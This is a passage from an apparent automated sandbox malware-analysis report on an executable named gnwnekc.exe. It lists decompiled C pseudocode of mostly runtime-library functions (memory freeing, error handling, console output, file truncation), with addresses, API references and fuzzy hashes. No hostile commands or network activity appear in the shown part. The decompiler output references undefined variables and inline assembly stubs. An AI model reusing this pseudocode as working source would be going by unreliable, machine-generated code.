						 *0x416c34 = 0x416c68;
						_v24 = _t25;
						__eflags = _t25;
						if(_t25 == 0) {
							L8:
							_t25 = 0x416c68;
							_v24 = 0x416c68;
						} else {
							__eflags =  *_t25;
							if( *_t25 == 0) {
								goto L8;
							}
						}
						_v12 = 0;
						_v20 = 0;
						_t64 = E004027D3(E00402951(_t25, 0, 0,  &_v12,  &_v20), _v12, _v20, 2);
						__eflags = _t64;
						if(__eflags != 0) {
							E00402951(_v24, _t64, _t64 + _v12 * 4,  &_v12,  &_v20);
							__eflags = _t47 - 1;
							if(_t47 != 1) {
								_v16 = 0;
								_push( &_v16);
								_t48 = E004072B0(_t47, _t57, 0, _t64);
								__eflags = _t48;
								if(_t48 == 0) {
									_t58 = _v16;
									_t54 = 0;
									_t35 = _t58;
									__eflags =  *_t58;
									if( *_t58 != 0) {
										do {
											_t35 =  &(_t35[1]);
											_t54 =  &(_t54[0]);
											__eflags =  *_t35;
										} while ( *_t35 != 0);
									}
									_t36 = 0;
									 *0x416c38 = _t54;
									_v16 = 0;
									_t48 = 0;
									 *0x416c40 = _t58;
								} else {
									_t36 = _v16;
								}
								E00405BB5(_t36);
								_v16 = 0;
							} else {
								_t41 = _v12 - 1;
								__eflags = _t41;
								 *0x416c38 = _t41;
								_t42 = _t64;
								_t64 = 0;
								 *0x416c40 = _t42;
								goto L13;
							}
						} else {
							_t43 = E004065F6(__eflags);
							_push(0xc);
							_pop(0);
							 *_t43 = 0;
							L13:
							_t48 = 0;
						}
						E00405BB5(_t64);
						_t39 = _t48;
					} else {
						__eflags = _t47 - 1;
						if(__eflags == 0) {
							goto L6;
						} else {
							_t44 = E004065F6(__eflags);
							_t66 = 0x16;
							 *_t44 = _t66;
							E00405C88();
							_t39 = _t66;
						}
					}
				} else {
					_t39 = 0;
				}
				return _t39;
			}

0x004027c8
0x004027cd
0x0040282b
0x00402830
0x0040283a
0x0040283d
0x0040285a
0x00402869
0x0040286f
0x00402874
0x0040287a
0x0040287d
0x0040287f
0x00402886
0x00402886
0x00402888
0x00402881
0x00402881
0x00402884
0x00000000
0x00000000
0x00402884
0x0040288e
0x00402895
0x004028ae
0x004028b3
0x004028b5
0x004028d6
0x004028de
0x004028e1
0x004028fc
0x004028ff
0x00402906
0x0040290a
0x0040290c
0x00402913
0x00402916
0x00402918
0x0040291a
0x0040291c
0x0040291e
0x0040291e
0x00402921
0x00402922
0x00402922
0x0040291e
0x00402926
0x00402928
0x0040292e
0x00402931
0x00402933
0x0040290e
0x0040290e
0x0040290e
0x0040293a
0x00402940
0x004028e3
0x004028e6
0x004028e6
0x004028e7
0x004028ec
0x004028ee
0x004028f0
0x00000000
0x004028f0
0x004028b7
0x004028b7
0x004028bc
0x004028be
0x004028bf
0x004028f5
0x004028f5
0x004028f5
0x00402944
0x0040294a
0x0040283f
0x0040283f
0x00402842
0x00000000
0x00402844
0x00402844
0x0040284b
0x0040284c
0x0040284e
0x00402853
0x00402853
0x00402842
0x00402832
0x00402832
0x00402832
0x00402950

Strings

C:\Users\user\AppData\Local\Temp\gnwnekc.exe, xrefs: 00402860, 00402867, 0040289B

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\gnwnekc.exe
API String ID: 0-2961849315
Opcode ID: 453829f50a0fe7ada04892179e48c9dc874aac9624a2a6477084f48c88611c48
Instruction ID: 03271fe0b23b121f3e93002c3e1ad4f30497d1379f4dc4de92c253f5e0d9d1b1
Opcode Fuzzy Hash: 453829f50a0fe7ada04892179e48c9dc874aac9624a2a6477084f48c88611c48
Instruction Fuzzy Hash: E441A871A00215ABDB21EB999D85D9FB7B8EB84310B11417BE500B73D0D7B49A41D798

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00402EF2() {
				intOrPtr _t2;
				signed int _t10;
				signed int _t11;

				if( *0x416e90 == 0) {
					_push(_t10);
					_t14 = E00407D2C();
					if(_t1 != 0) {
						_t2 = E00402FFA(_t14);
						if(_t2 != 0) {
							 *0x416e94 = _t2;
							_t11 = 0;
							 *0x416e90 = _t2;
						} else {
							_t11 = _t10 | 0xffffffff;
						}
						E00405BB5(0);
					} else {
						_t11 = _t10 | 0xffffffff;
					}
					E00405BB5(_t14);
					return _t11;
				} else {
					return 0;
				}
			}

0x00402ef9
0x00402eff
0x00402f05
0x00402f09
0x00402f11
0x00402f19
0x00402f20
0x00402f25
0x00402f27
0x00402f1b
0x00402f1b
0x00402f1b
0x00402f2e
0x00402f0b
0x00402f0b
0x00402f0b
0x00402f35
0x00402f3f
0x00402efb
0x00402efd
0x00402efd

APIs

_free.LIBCMT ref: 00402F35

Strings

X.(, xrefs: 00402EF2, 00402F27
X.(, xrefs: 00402F20

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free
String ID: X.($X.(
API String ID: 269201875-839687834
Opcode ID: c23a36a374eac7361dc5244b6c174e73d912b7536ffff4de6ea55a662a2cc182
Instruction ID: 3bd6b4188ab7e7aa2724aad889b714fdcd27ad34bf27940a5a0cb2dacb40e435
Opcode Fuzzy Hash: c23a36a374eac7361dc5244b6c174e73d912b7536ffff4de6ea55a662a2cc182
Instruction Fuzzy Hash: 39E0A03250651241E222163AED097AB2661AF81374B22033FE818A62D0DFF8A902A06E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA71 Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0040CA71(signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				signed int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0040CBE1( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E004065F6(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00409BFF(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00408141(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E00409BFF(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E004065F6(__eflags))) = 0xd;
						_t36 = E00406609(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E0040695A(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E004033CE(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0040A68C(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00406609(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E004065F6(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E004065F6(_t70)));
										E00405BB5(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E004033CE(_t56, _t50, _v12);
							E00405BB5(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E004065F6(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x0040ca71
0x0040ca7a
0x0040ca89
0x0040ca97
0x0040cbc0
0x0040cbc5
0x00000000
0x0040caac
0x0040caac
0x0040caaf
0x0040cab2
0x0040cab5
0x0040cab7
0x0040cb7c
0x0040cb85
0x0040cb8c
0x0040cb8f
0x0040cb92
0x00000000
0x00000000
0x0040cba2
0x0040cba4
0x0040cb49
0x0040cb49
0x0040cbc7
0x0040cbd2
0x0040cbe0
0x0040cbe0
0x0040cbab
0x0040cbb1
0x0040cbbe
0x00000000
0x0040cbbe
0x0040cabd
0x0040cad3
0x0040cad6
0x0040cad7
0x0040cad9
0x0040caf4
0x0040caf7
0x0040cafa
0x0040cafb
0x0040cafb
0x0040cafd
0x0040cb10
0x0040cb10
0x0040cb12
0x0040cb15
0x0040cb1a
0x0040cb1d
0x0040cb20
0x0040cb52
0x0040cb55
0x0040cb5c
0x0040cb5c
0x0040cb62
0x0040cb68
0x0040cb6a
0x00000000
0x0040cb6f
0x0040cb22
0x0040cb23
0x0040cb25
0x0040cb28
0x0040cb2a
0x0040cb2d
0x0040cb2f
0x0040cb09
0x0040cb09
0x00000000
0x0040cb09
0x0040cb31
0x00000000
0x00000000
0x00000000
0x0040cb31
0x0040caff
0x00000000
0x00000000
0x0040cb01
0x0040cb07
0x00000000
0x00000000
0x00000000
0x0040cb33
0x0040cb33
0x0040cb33
0x0040cb3b
0x0040cb41
0x0040cb46
0x00000000
0x0040cb46
0x0040cae0
0x00000000
0x0040cb72
0x0040cb72
0x0040cb74
0x00000000
0x00000000
0x0040cb76
0x00000000
0x00000000
0x0040cb78
0x0040cb7a
0x00000000
0x00000000
0x00000000
0x0040cb7a
0x0040cabd

APIs

_free.LIBCMT ref: 0040CB41
_free.LIBCMT ref: 0040CB6A
SetEndOfFile.KERNEL32(00000000,0040C21D,00000000,00408839,?,?,?,?,?,?,?,0040C21D,00408839,00000000), ref: 0040CB9C
GetLastError.KERNEL32(?,?,?,?,?,?,?,0040C21D,00408839,00000000,?,?,?,?,00000000,?), ref: 0040CBB8

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 70a85d22a1633a54e0167d194511b95707fd8edec48cdd458c468ea1755522f6
Instruction ID: cf588b9212c2719ff7c3ba49e6d11ea963b6a5c79d2570e0006e6b44ed36ab14
Opcode Fuzzy Hash: 70a85d22a1633a54e0167d194511b95707fd8edec48cdd458c468ea1755522f6
Instruction Fuzzy Hash: B741E432900204DBDB11ABB9AD83B9F3775AF44364F25063BF814B72D2EA3CE8504769

Uniqueness

Uniqueness Score: -1.00%

Function 00404C86 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00404C86(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x416030; // 0x5
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00404892(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E0040695A(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00404892(__eflags,  *0x416030, _t51);
							if(__eflags != 0) {
								E00404EFE(_t51, 0x417388);
								E00405BB5(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00404892(__eflags,  *0x416030, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00404892(0,  *0x416030, 0);
							_push(0);
							L9:
							E00405BB5();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00404853(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x416030; // 0x5
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00404251(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x416030; // 0x5
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00404892(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E0040695A(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00404892(__eflags,  *0x416030, _t60);
								if(__eflags != 0) {
									E00404EFE(_t60, 0x417388);
									E00405BB5(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00404892(__eflags,  *0x416030, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00404892(__eflags,  *0x416030, _t20);
								_push(_t60);
								L25:
								E00405BB5();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00404853(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x416030; // 0x5
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00404251(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x416030; // 0x5
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00404892(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E0040695A(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00404892(__eflags,  *0x416030, _t54);
											if(__eflags != 0) {
												E00404EFE(_t54, 0x417388);
												E00405BB5(0);
												goto L45;
											} else {
												_t40 = 0;
												E00404892(__eflags,  *0x416030, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00404892(0,  *0x416030, 0);
											_push(0);
											L41:
											E00405BB5();
											goto L36;
										}
									}
								} else {
									_t54 = E00404853(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x416030; // 0x5
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00404c86
0x00404c86
0x00404c91
0x00404c93
0x00404c98
0x00404c9b
0x00404cb9
0x00404cbc
0x00404cc1
0x00404cc3
0x00000000
0x00404cc5
0x00404cd1
0x00404cd4
0x00404cd5
0x00404cd7
0x00404cfc
0x00404cfe
0x00404d17
0x00404d1e
0x00404d23
0x00000000
0x00404d00
0x00404d00
0x00404d09
0x00404d0e
0x00000000
0x00404d0e
0x00404cd9
0x00404cd9
0x00404cd9
0x00404ce2
0x00404ce7
0x00404ce8
0x00404ce8
0x00404ced
0x00000000
0x00404ced
0x00404cd7
0x00404c9d
0x00404ca3
0x00404ca7
0x00404cb4
0x00000000
0x00404ca9
0x00404cac
0x00404d26
0x00404d26
0x00404cae
0x00404cae
0x00404cae
0x00404cb0
0x00404cb0
0x00404cb0
0x00404cac
0x00404ca7
0x00404d29
0x00404d31
0x00404d33
0x00404d35
0x00404d3d
0x00404d42
0x00404d43
0x00404d48
0x00404d49
0x00404d4c
0x00404d66
0x00404d69
0x00404d6e
0x00404d70
0x00000000
0x00404d72
0x00404d7e
0x00404d81
0x00404d82
0x00404d84
0x00404da7
0x00404da9
0x00404dc0
0x00404dc7
0x00404dcc
0x00000000
0x00404dab
0x00404db2
0x00404db7
0x00000000
0x00404db7
0x00404d86
0x00404d8d
0x00404d92
0x00404d93
0x00404d93
0x00404d98
0x00000000
0x00404d98
0x00404d84
0x00404d4e
0x00404d54
0x00404d56
0x00404d58
0x00404d61
0x00000000
0x00404d5a
0x00404d5a
0x00404d5d
0x00404dd7
0x00404dd7
0x00404ddc
0x00404ddf
0x00404de0
0x00404de1
0x00404de8
0x00404dea
0x00404def
0x00404df2
0x00404e10
0x00404e13
0x00404e18
0x00404e1a
0x00000000
0x00404e1c
0x00404e28
0x00404e2c
0x00404e2e
0x00404e53
0x00404e55
0x00404e6e
0x00404e75
0x00000000
0x00404e57
0x00404e57
0x00404e60
0x00404e65
0x00000000
0x00404e65
0x00404e30
0x00404e30
0x00404e30
0x00404e39
0x00404e3e
0x00404e3f
0x00404e3f
0x00000000
0x00404e44
0x00404e2e
0x00404df4
0x00404dfa
0x00404dfc
0x00404dfe
0x00404e0b
0x00000000
0x00404e00
0x00404e00
0x00404e03
0x00404e7d
0x00404e7d
0x00404e05
0x00404e05
0x00404e05
0x00404e05
0x00404e07
0x00404e07
0x00404e07
0x00404e03
0x00404dfe
0x00404e80
0x00404e88
0x00404e8a
0x00404e8a
0x00404e91
0x00404d5f
0x00404dcf
0x00404dcf
0x00404dd1
0x00000000
0x00404dd3
0x00404dd6
0x00404dd6
0x00404dd1
0x00404d5d
0x00404d58
0x00404d37
0x00404d3c
0x00404d3c

APIs

GetLastError.KERNEL32(?,?,?,0040A8A2,?,00000001,00406374,?,0040A726,00000001,?,?,?,00406488,?,?), ref: 00404C8B
_free.LIBCMT ref: 00404CE8
_free.LIBCMT ref: 00404D1E
SetLastError.KERNEL32(00000000,00000005,000000FF,?,0040A726,00000001,?,?,?,00406488,?,?,?,004151F8,0000002C,00406374), ref: 00404D29

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 19cf36f618c59f7cb83a2fb15d6ef9a478e6928b1525a799a34d311a1b4846ba
Instruction ID: 0e5c6abddaa40209bf1749b3ee294736a0be95212525a01e335f8ca19faa93f8
Opcode Fuzzy Hash: 19cf36f618c59f7cb83a2fb15d6ef9a478e6928b1525a799a34d311a1b4846ba
Instruction Fuzzy Hash: EA110DF62055043EE61073BA5D41E6B25699FC07BAB26863BF725722D1DE7CCC01511D

Uniqueness

Uniqueness Score: -1.00%

Function 00404DDD Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00404DDD(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x416030; // 0x5
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00404892(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E0040695A(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00404892(__eflags,  *0x416030, _t18);
							if(__eflags != 0) {
								E00404EFE(_t18, 0x417388);
								E00405BB5(0);
								goto L13;
							} else {
								_t13 = 0;
								E00404892(__eflags,  *0x416030, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00404892(0,  *0x416030, 0);
							_push(0);
							L9:
							E00405BB5();
							goto L4;
						}
					}
				} else {
					_t18 = E00404853(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x416030; // 0x5
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00404de8
0x00404dea
0x00404def
0x00404df2
0x00404e10
0x00404e13
0x00404e18
0x00404e1a
0x00000000
0x00404e1c
0x00404e28
0x00404e2c
0x00404e2e
0x00404e53
0x00404e55
0x00404e6e
0x00404e75
0x00000000
0x00404e57
0x00404e57
0x00404e60
0x00404e65
0x00000000
0x00404e65
0x00404e30
0x00404e30
0x00404e30
0x00404e39
0x00404e3e
0x00404e3f
0x00404e3f
0x00000000
0x00404e44
0x00404e2e
0x00404df4
0x00404dfa
0x00404dfe
0x00404e0b
0x00000000
0x00404e00
0x00404e03
0x00404e7d
0x00404e7d
0x00404e05
0x00404e05
0x00404e05
0x00404e07
0x00404e07
0x00404e07
0x00404e03
0x00404dfe
0x00404e80
0x00404e88
0x00404e91

APIs

GetLastError.KERNEL32(?,?,?,004065FB,0040BA1A,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D,?,00000000), ref: 00404DE2
_free.LIBCMT ref: 00404E3F
_free.LIBCMT ref: 00404E75
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D,?,00000000,00000004), ref: 00404E80

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6e30c080bf1b6dc495eed45e96a61900fda83b4c21b604032c88ac247831b5cf
Instruction ID: 1e001562c87c42a3e509cbcda1b3a97f42f047aa66678785d16abc1b63d63155
Opcode Fuzzy Hash: 6e30c080bf1b6dc495eed45e96a61900fda83b4c21b604032c88ac247831b5cf
Instruction Fuzzy Hash: CD112CB22015003ED71172B9DC81E672569BBC07B9725863BF735B22E1DE788C01819D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D006 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040D006(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x4168a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040D07A();
					E0040D05B();
					_t13 = WriteConsoleW( *0x4168a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0040d023
0x0040d027
0x0040d034
0x0040d039
0x0040d054
0x0040d054
0x0040d05a

APIs

WriteConsoleW.KERNEL32 ref: 0040D01D
GetLastError.KERNEL32(?,0040C7F1,?,00000001,?,00000001,?,0040ACB4,00000000,?,00000001,00000000,00000001,?,0040A74A,00406488), ref: 0040D029

Part of subcall function 0040D07A: CloseHandle.KERNEL32(FFFFFFFE), ref: 0040D08A

___initconout.LIBCMT ref: 0040D039

Part of subcall function 0040D05B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 0040D06E

WriteConsoleW.KERNEL32 ref: 0040D04E

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ff34bf17e7485a344c311059e329376c9b7105f419740c4b8e10ea7179de7406
Instruction ID: 921fe11248ca02bc3cc2722cf28d814f332a073af13e4a569be54782c32735de
Opcode Fuzzy Hash: ff34bf17e7485a344c311059e329376c9b7105f419740c4b8e10ea7179de7406
Instruction Fuzzy Hash: 0EF09E36501118BBCF222FD5DC04ADA3F65EB49375F458125FE1C95160C6328961DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402237 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402237() {

				E00405BB5( *0x417398);
				 *0x417398 = 0;
				E00405BB5( *0x41739c);
				 *0x41739c = 0;
				E00405BB5( *0x416c3c);
				 *0x416c3c = 0;
				E00405BB5( *0x416c40);
				 *0x416c40 = 0;
				return 1;
			}

0x00402240
0x0040224d
0x00402253
0x0040225e
0x00402264
0x0040226f
0x00402275
0x0040227d
0x00402286

APIs

_free.LIBCMT ref: 00402240

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 00402253
_free.LIBCMT ref: 00402264
_free.LIBCMT ref: 00402275

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2d3229d66c39f1a80a08cd669befc04ef1f45faf43100f3df4faf59e50691911
Instruction ID: e90212dccf04a321c434346c53befcb5f51f32ed567c279963bb210d00297663
Opcode Fuzzy Hash: 2d3229d66c39f1a80a08cd669befc04ef1f45faf43100f3df4faf59e50691911
Instruction Fuzzy Hash: 8DE04F704155249ADA226F26BC058CA3B71E744700302C07BFC14226B2FBB66212EFCE

Uniqueness

Uniqueness Score: -1.00%

Function 004064E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064E2(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x41738c; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
